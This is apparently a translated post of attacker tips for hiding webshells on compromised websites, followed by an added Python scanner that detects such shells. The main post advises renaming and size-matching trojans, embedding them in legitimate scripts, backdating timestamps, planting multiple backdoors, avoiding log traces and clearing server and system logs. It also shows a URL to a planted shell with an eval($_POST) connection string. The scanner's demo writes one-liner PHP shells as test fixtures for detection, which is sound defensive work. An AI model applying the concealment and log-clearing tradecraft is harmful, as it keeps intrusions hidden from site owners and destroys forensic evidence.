Webshell hiding and detection ideas

Source: Internet
Author: User

Let's go through the backdoor tips together. In short: pick, modify, hide, and hide again. First, an example. Example 1:

One glance at the directory listing is enough to spot it. Why does it stand out so much?

Suspicious indicators: file name, timestamp, and size. (Experienced administrators can quickly pick out uploaded trojan files by these alone.)

1. Backdoor Selection

Secure and reliable: no hidden backdoor inside the shell itself, and stable functionality. Attackers obtain reliable trojans from highly trusted sources.

Conventional shell links for a multi-tool setup (a small one-liner shell, a full-featured Trojan, and an obfuscated "metamorphosis" shell):

http://www.xxxxxx.org.hk/china60/axdx.php

Here is an example of connecting to an obfuscated shell (this is a one-liner shell that can be connected to with the "kitchen knife" client; without the `?_=assert&__=eval($_POST['pass'])` query string the connection fails):

http://www.xxxxxx.org.hk/china60/axdx.php?_=assert&__=eval($_POST['pass'])

2. Backdoor pre-processing (do as much of the work as possible locally, before uploading, so that fewer traces are left on the server)

Change the default password.

Rename the file so that it blends in with the folder it is uploaded to, making an abnormal file hard to spot at a glance.

Disguise the file size so that it looks like a normal script. An example of poor size disguise: padding the file with a large amount of useless characters just to make the size look natural. Instead, consider copying the contents of other normal scripts in the same folder.

3. Selection of the backdoor implantation method (upload, create new, or embed). Upload is the most intuitive method. Some sites do not allow uploads; in that case you can create a new file and paste the Trojan's contents into it. The most concealed option is to embed the Trojan into one of the website's normal scripts. Modify the file time. Hiding: plant multiple backdoors, place them at a deeper path, do not access the path unnecessarily, and leave fewer records. Once you know the access path, do not access it again for testing, so that the log does not record traces. Another example: (I can't tell whether it's a shell.)

4. Remove any conspicuous shell (it may have been uploaded by someone else). Clear logs: server logs and system logs. Summary:


TIPS: Pick, modify, hide, hide

(Careful selection, a change of appearance, a cunning rabbit with three burrows, plus hiding in plain sight.) Knowing how to hide a backdoor means knowing how to discover other people's backdoors. It is best to write an automated script for detection; that needs no further explanation.
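The detection script the post leaves unwritten, as an added example that is not part of the original post. It checks the three indicators the post itself names as giveaways (file contents, file timestamps, and deviation from what the directory normally contains) and treats a known-good hash baseline of the web root as the strongest signal, since it also catches a shell embedded in an otherwise legitimate script. The web root, the file names and the sample files are constructed for the demo; the regexes are generic signatures, not a complete webshell ruleset.

```python
"""Webshell triage scanner (added example; not the post's own code)."""
import hashlib
import os
import re
import tempfile
import time
from pathlib import Path
from typing import Dict, List, Optional

# Dangerous sinks fed directly from request data or from a decoder. The
# eval/assert-of-$_POST form is the one visible in the post's connection URL.
SUSPICIOUS_PATTERNS = {
    "eval_assert_of_request": re.compile(
        r"\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    "request_value_called_as_function": re.compile(
        r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I),
    "eval_of_decoded_blob": re.compile(
        r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "shell_exec_of_request": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
}
PHP_SUFFIXES = {".php", ".php5", ".phtml", ".inc"}


def content_findings(path: Path) -> List[str]:
    """Names of the suspicious patterns that match the file's contents."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]


def timestamp_anomaly(path: Path, max_gap_seconds: float = 86400) -> bool:
    """True when mtime is much older than ctime (Linux inode change time).

    Backdating mtime with touch does not move ctime, so a large gap is a clue
    that the time was "modified" as the post suggests. Unpacked archives show
    the same gap, so this is a weak indicator to confirm, not proof on its own.
    On Windows st_ctime is creation time and this check is not meaningful.
    """
    st = path.stat()
    return (st.st_ctime - st.st_mtime) > max_gap_seconds


def hash_tree(root: Path) -> Dict[str, str]:
    """SHA-256 manifest of every file under root, keyed by relative POSIX path."""
    manifest: Dict[str, str] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return manifest


def scan(root: Path, baseline: Optional[Dict[str, str]] = None) -> Dict[str, List[str]]:
    """Map relative path -> reasons, for every file that deserves a closer look."""
    findings: Dict[str, List[str]] = {}
    current = hash_tree(root)
    for rel, digest in current.items():
        reasons: List[str] = []
        p = root / rel
        if p.suffix.lower() in PHP_SUFFIXES:
            reasons += content_findings(p)
            if timestamp_anomaly(p):
                reasons.append("mtime_older_than_ctime")
        if baseline is not None:
            if rel not in baseline:
                reasons.append("not_in_baseline")        # new file, e.g. an upload
            elif baseline[rel] != digest:
                reasons.append("changed_since_baseline")  # e.g. shell embedded in a script
        if reasons:
            findings[rel] = reasons
    for rel in baseline or {}:
        if rel not in current:
            findings[rel] = ["missing_since_baseline"]
    return findings


def build_demo(root: Path) -> Dict[str, str]:
    """Create a constructed web root; return the baseline taken before the shells land."""
    (root / "inc").mkdir(parents=True)
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (root / "inc" / "config.php").write_text("<?php $db = 'localhost'; ?>\n")
    baseline = hash_tree(root)
    # New one-liner shell of the kind the post connects to, with mtime backdated a month.
    shell = root / "inc" / "axdx.php"
    shell.write_text("<?php eval($_POST['pass']); ?>\n")
    old = time.time() - 30 * 86400
    os.utime(shell, (old, old))
    # The "embed into a normal script" variant: the hash no longer matches the baseline.
    with (root / "index.php").open("a") as f:
        f.write("<?php assert($_POST['pass']); ?>\n")
    return baseline


def run_demo() -> Dict[str, List[str]]:
    """Build the constructed tree in a temp dir, scan it, and return the findings."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    return scan(root, build_demo(root))


if __name__ == "__main__":
    for rel, reasons in sorted(run_demo().items()):
        print(f"{rel}: {', '.join(reasons)}")
```

In practice the baseline is taken from a clean deployment (or the release artifact) and stored off the web server, so that a shell embedded in a legitimate script cannot also rewrite the manifest; the content regexes then serve as triage for files the baseline flags, and the timestamp check only adds weight to a finding rather than creating one by itself.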
